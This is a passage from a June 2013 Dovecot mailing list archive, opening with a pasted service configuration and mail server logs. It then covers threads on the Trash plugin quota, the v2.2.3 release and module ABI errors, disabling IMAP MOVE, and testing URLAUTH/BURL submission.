4294967295 secs privileged_group = process_limit = 1 process_min_avail = 0 protocol = service_count = 0 type = unix_listener director-admin { group = mode = 0600 user = } unix_listener login/director { group = mode = 00 user = } user = $default_internal_user vsz_limit = 18446744073709551615 B } service dns_client { chroot = client_limit = 1 drop_priv_before_exec = no executable = dns-client extra_groups = group = idle_kill = 0 privileged_group = process_limit = 0 process_min_avail = 0 protocol = service_count = 0 type = unix_listener dns-client { group = mode = 0666 user = } unix_listener login/dns-client { group = mode = 0666 user = } user = $default_internal_user vsz_limit = 18446744073709551615 B } service doveadm { chroot = client_limit = 1 drop_priv_before_exec = no executable = doveadm-server extra_groups = group = idle_kill = 0 privileged_group = process_limit = 0 process_min_avail = 0 protocol = service_count = 1 type = unix_listener doveadm-server { group = mode = 0600 user = } user = vsz_limit = 18446744073709551615 B } service imap-login { chroot = login client_limit = 0 drop_priv_before_exec = no executable = imap-login extra_groups = group = idle_kill = 0 inet_listener imap { address = port = 143 ssl = no } inet_listener imaps { address = port = 993 ssl = yes } privileged_group = process_limit = 0 process_min_avail = 0 protocol = imap service_count = 1 type = login user = $default_login_user vsz_limit = 64 M } service imap { chroot = client_limit = 1 drop_priv_before_exec = no executable = imap extra_groups = group = idle_kill = 0 privileged_group = process_limit = 1024 process_min_avail = 0 protocol = imap service_count = 1 type = unix_listener login/imap { group = mode = 0666 user = } user = vsz_limit = 256 M } service lmtp { chroot = client_limit = 0 drop_priv_before_exec = no executable = lmtp extra_groups = group = idle_kill = 0 privileged_group = process_limit = 0 process_min_avail = 0 protocol = lmtp service_count = 0 type = unix_listener lmtp { group = mode = 0666 user = } user = vsz_limit = 0 } service log { chroot = client_limit = 0 drop_priv_before_exec = no executable = log extra_groups = group = idle_kill = 0 privileged_group = process_limit = 1 process_min_avail = 0 protocol = service_count = 0 type = log user = vsz_limit = 18446744073709551615 B } service managesieve-login { chroot = login client_limit = 0 drop_priv_before_exec = no executable = managesieve-login extra_groups = group = idle_kill = 0 inet_listener sieve { address = port = 4190 ssl = no } privileged_group = process_limit = 0 process_min_avail = 0 protocol = sieve service_count = 1 type = login user = $default_login_user vsz_limit = 64 M } service managesieve { chroot = client_limit = 1 drop_priv_before_exec = no executable = managesieve extra_groups = group = idle_kill = 0 privileged_group = process_limit = 0 process_min_avail = 0 protocol = sieve service_count = 1 type = unix_listener login/sieve { group = mode = 0666 user = } user = vsz_limit = 18446744073709551615 B } service pop3-login { chroot = login client_limit = 0 drop_priv_before_exec = no executable = pop3-login extra_groups = group = idle_kill = 0 inet_listener pop3 { address = port = 110 ssl = no } inet_listener pop3s { address = port = 995 ssl = yes } privileged_group = process_limit = 0 process_min_avail = 0 protocol = pop3 service_count = 1 type = login user = $default_login_user vsz_limit = 64 M } service pop3 { chroot = client_limit = 1 drop_priv_before_exec = no executable = pop3 extra_groups = group = idle_kill = 0 privileged_group = process_limit = 1024 process_min_avail = 0 protocol = pop3 service_count = 1 type = unix_listener login/pop3 { group = mode = 0666 user = } user = vsz_limit = 18446744073709551615 B } service ssl-params { chroot = client_limit = 0 drop_priv_before_exec = no executable = ssl-params extra_groups = group = idle_kill = 0 privileged_group = process_limit = 0 process_min_avail = 0 protocol = service_count = 0 type = startup unix_listener login/ssl-params { group = mode = 0666 user = } user = vsz_limit = 18446744073709551615 B } shutdown_clients = yes ssl = yes ssl_ca = ssl_cert = Jun 17 00:48:13 nerv-03 postfix/qmgr[5885]: 1D9CA26265C: from=< jason.pfingstmann at gmail.com>, size=8185581, nrcpt=1 (queue active) Jun 17 00:48:13 nerv-03 postfix/smtpd[20800]: disconnect from mail-oa0-f51.google.com[209.85.219.51] Jun 17 00:48:13 nerv-03 dovecot: auth: mysql: Connected to localhost (mail) Jun 17 00:48:13 nerv-03 dovecot: imap-login: Login: user=< test at otakuuniversity.org>, method=PLAIN, rip=::1, lip=::1, mpid=20834, secured Jun 17 00:48:13 nerv-03 dovecot: imap(test at otakuuniversity.org): Disconnected: Logged out bytes=90/779 Jun 17 00:48:15 nerv-03 postfix/smtpd[20839]: connect from unknown[127.0.0.1] Jun 17 00:48:15 nerv-03 postfix/smtpd[20839]: 6CDC726265D: client=unknown[127.0.0.1] Jun 17 00:48:15 nerv-03 postfix/cleanup[20808]: 6CDC726265D: message-id= Jun 17 00:48:15 nerv-03 postfix/smtpd[20839]: disconnect from unknown[127.0.0.1] Jun 17 00:48:15 nerv-03 postfix/qmgr[5885]: 6CDC726265D: from=< jason.pfingstmann at gmail.com>, size=8186433, nrcpt=1 (queue active) Jun 17 00:48:15 nerv-03 amavis[29202]: (29202-06) Passed CLEAN {RelayedInbound}, [209.85.219.51]:47269 [209.85.219.51] < jason.pfingstmann at gmail.com> -> , Message-ID: , mail_id: WX-Kn6BdkJ7l, Hits: 0.002, size: 8185580, queued_as: 6CDC726265D, dkim_sd=20120113:gmail.com, 1967 ms Jun 17 00:48:15 nerv-03 postfix/smtp[20819]: 1D9CA26265C: to=< test at otakuuniversity.org>, relay=127.0.0.1[127.0.0.1]:10024, delay=6.7, delays=4.7/0.01/0/2, dsn=2.0.0, status=sent (250 2.0.0 from MTA(smtp:[127.0.0.1]:10025): 250 2.0.0 Ok: queued as 6CDC726265D) Jun 17 00:48:15 nerv-03 postfix/qmgr[5885]: 1D9CA26265C: removed Jun 17 00:48:15 nerv-03 dovecot: dict: mysql: Connected to localhost (mail) Jun 17 00:48:15 nerv-03 dovecot: lda(test at otakuuniversity.org): Error: sieve: msgid=: failed to store into mailbox 'INBOX': Quota exceeded (mailbox for user is full) Jun 17 00:48:15 nerv-03 dovecot: lda(test at otakuuniversity.org): Error: sieve: script /home/vmail/otakuuniversity.org/test/dovecot.sieve failed with unsuccessful implicit keep (user logfile /home/vmail/ otakuuniversity.org/test/dovecot.sieve.log may reveal additional details) Jun 17 00:48:15 nerv-03 dovecot: lda(test at otakuuniversity.org): msgid=: rejected: Quota exceeded (mailbox for user is full) Jun 17 00:48:15 nerv-03 postfix/pickup[5887]: B3A1126265C: uid=5000 from=<> Jun 17 00:48:15 nerv-03 postfix/cleanup[20808]: B3A1126265C: message-id=< dovecot-1371422895-666694-0 at nerv-03.otakuuniversity.org> Jun 17 00:48:15 nerv-03 postfix/pipe[20841]: 6CDC726265D: to=< test at otakuuniversity.org>, relay=dovecot, delay=0.29, delays=0.2/0.01/0/0.09, dsn=2.0.0, status=sent (delivered via dovecot service) Jun 17 00:48:15 nerv-03 postfix/qmgr[5885]: 6CDC726265D: removed Jun 17 00:48:15 nerv-03 postfix/qmgr[5885]: B3A1126265C: from=<>, size=4409, nrcpt=1 (queue active) Jun 17 00:48:15 nerv-03 postfix/smtp[20847]: certificate verification failed for gmail-smtp-in.l.google.com[173.194.70.27]:25: untrusted issuer /C=US/O=Equifax/OU=Equifax Secure Certificate Authority Jun 17 00:48:16 nerv-03 postfix/smtp[20847]: B3A1126265C: to=< jason.pfingstmann at gmail.com>, relay=gmail-smtp-in.l.google.com[173.194.70.27]:25, delay=0.87, delays=0.01/0.01/0.13/0.72, dsn=2.0.0, status=sent (250 2.0.0 OK 1371423370 p43si7910797eeu.4 - gsmtp) Jun 17 00:48:16 nerv-03 postfix/qmgr[5885]: B3A1126265C: removed trash.conf: 1 Spam 2 Trash Also tried INBOX. From jason at pfingstmann.com Mon Jun 17 04:35:11 2013 From: jason at pfingstmann.com (Jason Pfingstmann) Date: Sun, 16 Jun 2013 18:35:11 -0700 Subject: [Dovecot] Trash plugin Message-ID: Hello all! I tried to post this earlier today, but it's stuck in a moderator queue for being too long, so here's a shorter version (mod, please delete the pending message from me, if you read this). I'm new to dovecot and just finished setting everything up. It's a postfix + dovecot + myql + spamassassin + postgrey virtual mail server. The issue I'm having (1 of 2) is that the Trash plugin isn't working, over-quota mail is being rejected despite a large piece that would bring it under quota with room to spare for the piece being delivered that is in the Trash folder. My configs (postconf -n, doveconf -n, trash.conf): http://pastebin.com/vFJ0rfZ6 It may be unrelated, but it seems postgrey isn't running either, but maybe those are partially tied together? Thanks for all your help! Jason Pfingstmann From jlbrown at bordo.com.au Mon Jun 17 09:02:17 2013 From: jlbrown at bordo.com.au (James Brown) Date: Mon, 17 Jun 2013 16:02:17 +1000 Subject: [Dovecot] [Dovecot-news] v2.2.3 released In-Reply-To: <1371418917.5513.3.camel@innu.dovecot.net> References: <1371418917.5513.3.camel@innu.dovecot.net> Message-ID: Have just upgraded to 2.2.3 and when it started I got these lines in the log: dovecot[44069]: master: Dovecot v2.2.3 starting up (core dumps disabled) Jun 17 15:48:46 mail dovecot[44072]: config: Error: Module is for different ABI version 2.2.ABIv2(2.2.2) (we have 2.2.ABIv3(2.2.3)): /usr/local/lib/dovecot/settings/libmanagesieve_login_settings.so Jun 17 15:48:46 mail dovecot[44072]: config: Error: Module is for different ABI version 2.2.ABIv2(2.2.2) (we have 2.2.ABIv3(2.2.3)): /usr/local/lib/dovecot/settings/libmanagesieve_settings.so Can someone tell me how to fix this? I'm running on Mac OS X 10.7.5. Many thanks, James. From me at junc.eu Mon Jun 17 09:09:53 2013 From: me at junc.eu (Benny Pedersen) Date: Mon, 17 Jun 2013 08:09:53 +0200 Subject: [Dovecot] [Dovecot-news] v2.2.3 released In-Reply-To: References: <1371418917.5513.3.camel@innu.dovecot.net> Message-ID: <57a416fcfb7737dc6b5691fc76ccfb2d@junc.eu> James Brown skrev den 2013-06-17 08:02: > Jun 17 15:48:46 mail dovecot[44072]: config: Error: Module is for > different ABI version 2.2.ABIv2(2.2.2) (we have 2.2.ABIv3(2.2.3)): > /usr/local/lib/dovecot/settings/libmanagesieve_settings.so > > Can someone tell me how to fix this? you wait for pigenhole 2.2.3 try disable this plugin and dovecot 2.2.3 works like a charm sieve managesieve -- senders that put my email into body content will deliver it to my own trashcan, so if you like to get reply, dont do it From lists at luigirosa.com Mon Jun 17 09:11:08 2013 From: lists at luigirosa.com (Luigi Rosa) Date: Mon, 17 Jun 2013 08:11:08 +0200 Subject: [Dovecot] [Dovecot-news] v2.2.3 released In-Reply-To: <57a416fcfb7737dc6b5691fc76ccfb2d@junc.eu> References: <1371418917.5513.3.camel@innu.dovecot.net> <57a416fcfb7737dc6b5691fc76ccfb2d@junc.eu> Message-ID: <51BEA87C.1090505@luigirosa.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Benny Pedersen said the following on 17/06/2013 08:09: > James Brown skrev den 2013-06-17 08:02: >> Jun 17 15:48:46 mail dovecot[44072]: config: Error: Module is for >> different ABI version 2.2.ABIv2(2.2.2) (we have 2.2.ABIv3(2.2.3)): >> /usr/local/lib/dovecot/settings/libmanagesieve_settings.so >> >> Can someone tell me how to fix this? > > you wait for pigenhole 2.2.3 I did a make/make install with pigeonhole 0.4.0 and everything works as expected Ciao, luigi - -- / +--[Luigi Rosa]-- \ I got the bill for my surgery. Now I know what those doctors were wearing masks for. --James Boren -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with undefined - http://www.enigmail.net/ iEYEARECAAYFAlG+qHwACgkQ3kWu7Tfl6ZR4xwCeKkFH/mOO5DGnj/OMtUl49GqL OLwAn0MS1griwtEKPWygnKfso1LRFgMv =lsi9 -----END PGP SIGNATURE----- From olfway at gmail.com Mon Jun 17 09:53:36 2013 From: olfway at gmail.com (Pavel Volkovitskiy) Date: Mon, 17 Jun 2013 10:53:36 +0400 Subject: [Dovecot] IMAP MOVE and lazy_expunge_only_last_instance In-Reply-To: <7529EB59-5F48-4012-8863-F8D36233BB00@iki.fi> References: <7529EB59-5F48-4012-8863-F8D36233BB00@iki.fi> Message-ID: On Sun, Jun 16, 2013 at 11:30 PM, Timo Sirainen wrote: > On 14.6.2013, at 10.12, Pavel Volkovitskiy wrote: > > > im testing lazy_expunge_only_last_instance here and it seems it works > wrong > > with IMAP MOVE > > I suppose you mean with mdbox format? Seems to be annoyingly difficult to > fix.. > > ?yep, mdbox? format ?can i disable imap move support somehow? imap copy and delete will still works fast, thanks to mdbox? -- Pavel From Ralf.Hildebrandt at charite.de Mon Jun 17 09:58:53 2013 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 17 Jun 2013 08:58:53 +0200 Subject: [Dovecot] v2.2.3 released In-Reply-To: <1371418917.5513.3.camel@innu.dovecot.net> References: <1371418917.5513.3.camel@innu.dovecot.net> Message-ID: <20130617065853.GB29787@charite.de> * Timo Sirainen : > http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz > http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz.sig > > This is a pretty important upgrade for v2.2 users, because of the IMAP > ENVELOPE reply fix. Compiled & installed. Seems to work for me :) > * LDA/LMTP: If new mail delivery first fails with "temporary > failure", tempfail the whole delivery instead of falling back to > delivering the mail to INBOX. (Requires new Pigeonhole as well.) That's wonderful! > - IMAP: If subject contained only whitespace, Dovecot returned an > ENVELOPE reply with a huge literal value, effectively causing the > IMAP client to wait for more data forever. I wonder which clients this affected? -- Ralf Hildebrandt Gesch?ftsbereich IT | Abteilung Netzwerk Charit? - Universit?tsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From tss at iki.fi Mon Jun 17 10:19:35 2013 From: tss at iki.fi (Timo Sirainen) Date: Mon, 17 Jun 2013 10:19:35 +0300 Subject: [Dovecot] IMAP MOVE and lazy_expunge_only_last_instance In-Reply-To: References: <7529EB59-5F48-4012-8863-F8D36233BB00@iki.fi> Message-ID: <83140141-0F5A-496E-8EB6-E144A72C3DFD@iki.fi> On 17.6.2013, at 9.53, Pavel Volkovitskiy wrote: > On Sun, Jun 16, 2013 at 11:30 PM, Timo Sirainen wrote: > >> On 14.6.2013, at 10.12, Pavel Volkovitskiy wrote: >> >>> im testing lazy_expunge_only_last_instance here and it seems it works >> wrong >>> with IMAP MOVE >> >> I suppose you mean with mdbox format? Seems to be annoyingly difficult to >> fix.. >> >> > ?yep, mdbox? format > > ?can i disable imap move support somehow? imap copy and delete will still > works fast, thanks to mdbox? You'd need to set imap_capability to the full list of post-login capabilities and just remove MOVE from there. From alec at alec.pl Mon Jun 17 10:24:57 2013 From: alec at alec.pl (A.L.E.C) Date: Mon, 17 Jun 2013 09:24:57 +0200 Subject: [Dovecot] v2.2.3 released In-Reply-To: <20130617065853.GB29787@charite.de> References: <1371418917.5513.3.camel@innu.dovecot.net> <20130617065853.GB29787@charite.de> Message-ID: <51BEB9C9.7060102@alec.pl> On 06/17/2013 08:58 AM, Ralf Hildebrandt wrote: >> - IMAP: If subject contained only whitespace, Dovecot returned an >> ENVELOPE reply with a huge literal value, effectively causing the >> IMAP client to wait for more data forever. > > I wonder which clients this affected? Not Roundcube, we do not use ENVELOPE. -- Aleksander 'A.L.E.C' Machniak LAN Management System Developer [http://lms.org.pl] Roundcube Webmail Developer [http://roundcube.net] --------------------------------------------------- PGP: 19359DC1 @@ GG: 2275252 @@ WWW: http://alec.pl From olfway at gmail.com Mon Jun 17 10:42:52 2013 From: olfway at gmail.com (Pavel Volkovitskiy) Date: Mon, 17 Jun 2013 11:42:52 +0400 Subject: [Dovecot] IMAP MOVE and lazy_expunge_only_last_instance In-Reply-To: <83140141-0F5A-496E-8EB6-E144A72C3DFD@iki.fi> References: <7529EB59-5F48-4012-8863-F8D36233BB00@iki.fi> <83140141-0F5A-496E-8EB6-E144A72C3DFD@iki.fi> Message-ID: On Mon, Jun 17, 2013 at 11:19 AM, Timo Sirainen wrote: > >>> im testing lazy_expunge_only_last_instance here and it seems it works > >> wrong > >>> with IMAP MOVE > >> > >> I suppose you mean with mdbox format? Seems to be annoyingly difficult > to > >> fix.. > >> > >> > > ?yep, mdbox? format > > > > ?can i disable imap move support somehow? imap copy and delete will still > > works fast, thanks to mdbox? > > You'd need to set imap_capability to the full list of post-login > capabilities and just remove MOVE from there. > > ?Timo, thanks, will try this? -- Pavel From rs at sys4.de Mon Jun 17 10:58:01 2013 From: rs at sys4.de (Robert Schetterer) Date: Mon, 17 Jun 2013 09:58:01 +0200 Subject: [Dovecot] v2.2.3 released / xi.rename-it.nl dovecot-2.2.patched In-Reply-To: <1371418917.5513.3.camel@innu.dovecot.net> References: <1371418917.5513.3.camel@innu.dovecot.net> Message-ID: <51BEC189.8000500@sys4.de> Am 16.06.2013 23:41, schrieb Timo Sirainen: > http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz > http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz.sig > > This is a pretty important upgrade for v2.2 users, because of the IMAP > ENVELOPE reply fix. > > * LDA/LMTP: If new mail delivery first fails with "temporary > failure", tempfail the whole delivery instead of falling back to > delivering the mail to INBOX. (Requires new Pigeonhole as well.) > * doc/solr-schema.xml was updated to Solr v4.x format. Also the > default analyzers were changed, hopefully for the better. Note that > the schema can't be changed for existing Solr indexes without > rebuilding everything. > * Solr plugin does only soft commits from now on. You'll need a > cronjob to send a hard commit command to it every few minutes. > > + Added %N modifier for variables as %H-like "new hash" > + sdbox, mdbox: Support POP3 message order field (for migrations) > + Added mailbox { driver } to specify a different mail storage > format for the mailbox than generally used within the namespace. > + Added initial lib-sasl library for client side SASL support. > Currently supports only PLAIN, LOGIN and plugins. Used currently > by IMAP and POP3 proxying when authenticating to the remote server. > - IMAP: If subject contained only whitespace, Dovecot returned an > ENVELOPE reply with a huge literal value, effectively causing the > IMAP client to wait for more data forever. > - IMAP: Various URLAUTH fixes. > - imapc: Various bugfixes and improvements > - pop3c: Various fixes to make it work in dsync (without imapc) > - dsync: Fixes to syncing subscriptions. Fixes to syncing mailbox > renames. > > i have a few questions i just setted up a test server for dovecot and other stuff and used http://xi.rename-it.nl/debian/pool/testing-auto/dovecot-2.2.patched/ but i am not really sure whats the exact meaning of "patched" here also is there more docs on "lib-sasl library for client side SASL support." and lemonade submission stuff ( perhaps this is what patched means ) is there some lemonade client for testing oder some telnet procedure description which may used for testing lemonade stuff Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From leva at ecentrum.hu Mon Jun 17 11:00:17 2013 From: leva at ecentrum.hu (LEVAI Daniel) Date: Mon, 17 Jun 2013 10:00:17 +0200 Subject: [Dovecot] auth probes without IP - "Initial status notification not received ..." Message-ID: <20130617080017.GA13445@daniell-kurt.KURTHQ.local> Hi! I've been getting a bunch of these messages lately in my logs: dovecot: master: Error: service(auth): Initial status notification not received in 30 seconds, killing the process dovecot: auth: Fatal: master: service(auth): child 11016 killed with signal 9 dovecot: master: Error: service(auth): Initial status notification not received in 30 seconds, killing the process dovecot: auth: Fatal: master: service(auth): child 27660 killed with signal 9 # fgrep -c -e "master: Error: service(auth): Initial status" dovecot.log* [...] dovecot.log.1:501 dovecot.log.2:250 [...] But I can not link these auth probes to any IP addresses within the dovecot log files. This is dovecot-2.2.2 on OpenBSD-stable. What do you guys suggest? Thanks, Daniel -- L?VAI D?niel PGP key ID = 0x83B63A8F Key fingerprint = DBEC C66B A47A DFA2 792D 650C C69B BE4C 83B6 3A8F From rs at sys4.de Mon Jun 17 11:00:29 2013 From: rs at sys4.de (Robert Schetterer) Date: Mon, 17 Jun 2013 10:00:29 +0200 Subject: [Dovecot] dovecot 2.2 with lucene compile error In-Reply-To: <5142DA77-3BAF-4164-8ADE-D8EDD8755EC0@iki.fi> References: <51BADF4F.1090606@sys4.de> <5142DA77-3BAF-4164-8ADE-D8EDD8755EC0@iki.fi> Message-ID: <51BEC21D.6040009@sys4.de> Am 16.06.2013 20:26, schrieb Timo Sirainen: > On 14.6.2013, at 12.15, Robert Schetterer wrote: > >> Hi ,i get an compile error >> >> security -Werror=format-security -MT lucene-wrapper.lo -MD -MP -MF >> .deps/lucene-wrapper.Tpo -c lucene-wrapper.cc -fPIC -DPIC -o >> .libs/lucene-wrapper.o >> lucene-wrapper.cc: In function 'lucene_index* lucene_index_init(const >> char*, mailbox_list*, const fts_lucene_settings*)': >> lucene-wrapper.cc:128:2: error: 'else' without a previous 'if' >> make[5]: *** [lucene-wrapper.lo] Error 1 > > Fixed: http://hg.dovecot.org/dovecot-2.2/rev/3c9bb07ea92e > works now , tested with v2.2.3, thx Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From stephan at rename-it.nl Mon Jun 17 12:13:24 2013 From: stephan at rename-it.nl (Stephan Bosch) Date: Mon, 17 Jun 2013 11:13:24 +0200 Subject: [Dovecot] v2.2.3 released / xi.rename-it.nl dovecot-2.2.patched In-Reply-To: <51BEC189.8000500@sys4.de> References: <1371418917.5513.3.camel@innu.dovecot.net> <51BEC189.8000500@sys4.de> Message-ID: <51BED334.6080801@rename-it.nl> Op 6/17/2013 9:58 AM, Robert Schetterer schreef: > Am 16.06.2013 23:41, schrieb Timo Sirainen: >> http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz >> http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz.sig >> >> This is a pretty important upgrade for v2.2 users, because of the IMAP >> ENVELOPE reply fix. >> >> * LDA/LMTP: If new mail delivery first fails with "temporary >> failure", tempfail the whole delivery instead of falling back to >> delivering the mail to INBOX. (Requires new Pigeonhole as well.) >> * doc/solr-schema.xml was updated to Solr v4.x format. Also the >> default analyzers were changed, hopefully for the better. Note that >> the schema can't be changed for existing Solr indexes without >> rebuilding everything. >> * Solr plugin does only soft commits from now on. You'll need a >> cronjob to send a hard commit command to it every few minutes. >> >> + Added %N modifier for variables as %H-like "new hash" >> + sdbox, mdbox: Support POP3 message order field (for migrations) >> + Added mailbox { driver } to specify a different mail storage >> format for the mailbox than generally used within the namespace. >> + Added initial lib-sasl library for client side SASL support. >> Currently supports only PLAIN, LOGIN and plugins. Used currently >> by IMAP and POP3 proxying when authenticating to the remote server. >> - IMAP: If subject contained only whitespace, Dovecot returned an >> ENVELOPE reply with a huge literal value, effectively causing the >> IMAP client to wait for more data forever. >> - IMAP: Various URLAUTH fixes. >> - imapc: Various bugfixes and improvements >> - pop3c: Various fixes to make it work in dsync (without imapc) >> - dsync: Fixes to syncing subscriptions. Fixes to syncing mailbox >> renames. >> >> > i have a few questions > > i just setted up a test server for dovecot and other stuff > and used > > http://xi.rename-it.nl/debian/pool/testing-auto/dovecot-2.2.patched/ > > but i am not really sure whats the exact meaning of "patched" here While the Xi repositories are meant for testing to begin with, the .patched repositories are probably even more volatile as these include my personal patches against Dovecot (in this case http://hg.rename-it.nl/dovecot-2.2-patches/file/tip). I deliberately do not refer to these repositories in the wiki documentation, as these don't have 'vanilla' Dovecot packages. So, don't use these if you're looking for the latest official (yet unreleased) Dovecot revision. > also is there more docs on > > "lib-sasl library for client side SASL support." Before, code for doing client side (PLAIN) SASL login (e.g. for imapc) was spread and duplicated at multiple locations in Dovecot code. This change puts it at a single spot and makes it easily extensible with support for new mechanisms. > and lemonade submission stuff http://tools.ietf.org/html/rfc5550#section-8 This was discussed a while ago on the mailing list: http://www.dovecot.org/list/dovecot/2013-May/090288.html The submission patch adds an example configuration, although I haven't updated that in a while. It is also possible that the submission server is not in a usable state right now. > ( perhaps this is what patched means ) Yes. If I am working on some new Dovecot feature, it's included in this repository. > is there some lemonade client for testing Trojita supports URLAUTH/BURL. There is no telnet procedure described that I know of anywhere, but you should be able to digest what you need from the relevant RFCs and the examples therein: http://tools.ietf.org/html/rfc3501 (IMAP) http://tools.ietf.org/html/rfc4467 (URLAUTH) http://tools.ietf.org/html/rfc5321 (SMTP) http://tools.ietf.org/html/rfc4954 (SMTP AUTH) http://tools.ietf.org/html/rfc4467 (BURL) It basically boils down to: login to IMAP (port 143), APPEND a message to one of your mailboxes, generate an URLAUTH for it using the GENURLAUTH command, login to SMTP submission (port 587), issue MAIL FROM: and RCPT TO: commands and finally send the message using the BURL command with the URLAUTH generated from IMAP. Regards, Stephan. From rs at sys4.de Mon Jun 17 12:25:14 2013 From: rs at sys4.de (Robert Schetterer) Date: Mon, 17 Jun 2013 11:25:14 +0200 Subject: [Dovecot] v2.2.3 released / xi.rename-it.nl dovecot-2.2.patched In-Reply-To: <51BED334.6080801@rename-it.nl> References: <1371418917.5513.3.camel@innu.dovecot.net> <51BEC189.8000500@sys4.de> <51BED334.6080801@rename-it.nl> Message-ID: <51BED5FA.2050701@sys4.de> Am 17.06.2013 11:13, schrieb Stephan Bosch: > Op 6/17/2013 9:58 AM, Robert Schetterer schreef: >> Am 16.06.2013 23:41, schrieb Timo Sirainen: >>> http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz >>> http://dovecot.org/releases/2.2/dovecot-2.2.3.tar.gz.sig >>> >>> This is a pretty important upgrade for v2.2 users, because of the IMAP >>> ENVELOPE reply fix. >>> >>> * LDA/LMTP: If new mail delivery first fails with "temporary >>> failure", tempfail the whole delivery instead of falling back to >>> delivering the mail to INBOX. (Requires new Pigeonhole as well.) >>> * doc/solr-schema.xml was updated to Solr v4.x format. Also the >>> default analyzers were changed, hopefully for the better. Note >>> that >>> the schema can't be changed for existing Solr indexes without >>> rebuilding everything. >>> * Solr plugin does only soft commits from now on. You'll need a >>> cronjob to send a hard commit command to it every few minutes. >>> >>> + Added %N modifier for variables as %H-like "new hash" >>> + sdbox, mdbox: Support POP3 message order field (for migrations) >>> + Added mailbox { driver } to specify a different mail storage >>> format for the mailbox than generally used within the namespace. >>> + Added initial lib-sasl library for client side SASL support. >>> Currently supports only PLAIN, LOGIN and plugins. Used currently >>> by IMAP and POP3 proxying when authenticating to the remote >>> server. >>> - IMAP: If subject contained only whitespace, Dovecot returned an >>> ENVELOPE reply with a huge literal value, effectively causing the >>> IMAP client to wait for more data forever. >>> - IMAP: Various URLAUTH fixes. >>> - imapc: Various bugfixes and improvements >>> - pop3c: Various fixes to make it work in dsync (without imapc) >>> - dsync: Fixes to syncing subscriptions. Fixes to syncing mailbox >>> renames. >>> >>> >> i have a few questions >> >> i just setted up a test server for dovecot and other stuff >> and used >> >> http://xi.rename-it.nl/debian/pool/testing-auto/dovecot-2.2.patched/ >> >> but i am not really sure whats the exact meaning of "patched" here > > While the Xi repositories are meant for testing to begin with, the > .patched repositories are probably even more volatile as these include > my personal patches against Dovecot (in this case > http://hg.rename-it.nl/dovecot-2.2-patches/file/tip). I deliberately do > not refer to these repositories in the wiki documentation, as these > don't have 'vanilla' Dovecot packages. So, don't use these if you're > looking for the latest official (yet unreleased) Dovecot revision. no problem, i do only testing, but understand what you mean thx for info > >> also is there more docs on >> >> "lib-sasl library for client side SASL support." > > Before, code for doing client side (PLAIN) SASL login (e.g. for imapc) > was spread and duplicated at multiple locations in Dovecot code. This > change puts it at a single spot and makes it easily extensible with > support for new mechanisms. > >> and lemonade submission stuff > > http://tools.ietf.org/html/rfc5550#section-8 > > This was discussed a while ago on the mailing list: > > http://www.dovecot.org/list/dovecot/2013-May/090288.html > > The submission patch adds an example configuration, although I haven't > updated that in a while. It is also possible that the submission server > is not in a usable state right now. > >> ( perhaps this is what patched means ) > > Yes. If I am working on some new Dovecot feature, it's included in this > repository. > >> is there some lemonade client for testing > > Trojita supports URLAUTH/BURL. There is no telnet procedure described > that I know of anywhere, but you should be able to digest what you need > from the relevant RFCs and the examples therein: > > http://tools.ietf.org/html/rfc3501 (IMAP) > http://tools.ietf.org/html/rfc4467 (URLAUTH) > http://tools.ietf.org/html/rfc5321 (SMTP) > http://tools.ietf.org/html/rfc4954 (SMTP AUTH) > http://tools.ietf.org/html/rfc4467 (BURL) > > It basically boils down to: login to IMAP (port 143), APPEND a message > to one of your mailboxes, generate an URLAUTH for it using the > GENURLAUTH command, login to SMTP submission (port 587), issue MAIL > FROM: and RCPT TO: commands and finally send the message using the BURL > command with the URLAUTH generated from IMAP. > > Regards, > > Stephan. Thx for clarification Stephan, i see there is lots of news, i have to look at , Trojita looks nice on screenshots Best Regards MfG Robert Schetterer -- [*] sys4 AG http://sys4.de, +49 (89) 30 90 46 64 Franziskanerstra?e 15, 81669 M?nchen Sitz der Gesellschaft: M?nchen, Amtsgericht M?nchen: HRB 199263 Vorstand: Patrick Ben Koetter, Axel von der Ohe, Marc Schiffbauer Aufsichtsratsvorsitzender: Florian Kirstein From AxelLuttgens at swing.be Mon Jun 17 14:00:43 2013 From: AxelLuttgens at swing.be (Axel Luttgens) Date: Mon, 17 Jun 2013 13:00:43 +0200 Subject: [Dovecot] Dovecot 2.2.2: doveadm user doesn't honor -x option In-Reply-To: <14D65C5E-31C0-4164-B71F-E33961B92B6E@iki.fi> References: <016CDD6F-ACA9-431D-920B-E29BD8DF2FD2@swing.be> <14D65C5E-31C0-4164-B71F-E33961B92B6E@iki.fi> Message-ID: <4BBC309A-25C7-48BF-88C3-AEE56FDC103F@swing.be> Le 16 juin 2013 ? 19:19, Timo Sirainen a ?crit : > [...] > > Fixed: http://hg.dovecot.org/dovecot-2.2/rev/c290383e60da Hello Timo, Thanks: just tried with 2.2.3, and it worked as expected. >> The same config with Dovecot 2.1.16 yields expected results. > > v2.1 worked a bit differently by returning only the userdb info and skipping the dovecot.conf settings. Giving -u parameter to doveadm user uses the old way, and the service works also there. Now that you wrote about that -u option, I vaguely recalled about it, and indeed found this one in the ChangeLog: doveadm user: Removed -m parameter and made it default. Added -u for old functionality. -u meaning "userdb 